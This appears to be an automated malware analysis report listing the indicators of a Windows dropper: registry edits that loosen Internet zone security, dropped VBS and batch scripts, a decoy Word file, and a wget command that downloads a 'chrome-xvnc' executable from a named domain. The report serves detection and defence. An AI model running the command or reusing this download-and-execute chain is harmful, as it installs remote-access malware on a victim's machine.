Technical Information
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1400' = '00000003'
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1C00' = '00000000'
- %TEMP%\getchrome.cmd
- %TEMP%\getchrome.vbs
- %TEMP%\wget.exe
- %TEMP%\vizit.docx
- nul
- 'br###ridge.com':80
- 'br###ridge.com':443
- http://br###ridge.com/images/thumb/chrome-xvnc-v5517.exe
- 'br###ridge.com':443
- DNS ASK br###ridge.com
- ClassName: 'EDIT' WindowName: ''
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\getchrome.vbs"
- '%TEMP%\wget.exe' -N http://brokbridge.com/images/thumb/chrome-xvnc-v5517.exe
- '%WINDIR%\syswow64\cmd.exe' /c getchrome.cmd (with hidden window)
- '%ProgramFiles%\microsoft office\office14\winword.exe' /n "%TEMP%\vizit.docx"
- '%WINDIR%\syswow64\cmd.exe' /c getchrome.cmd
- '%WINDIR%\syswow64\chcp.com' 1251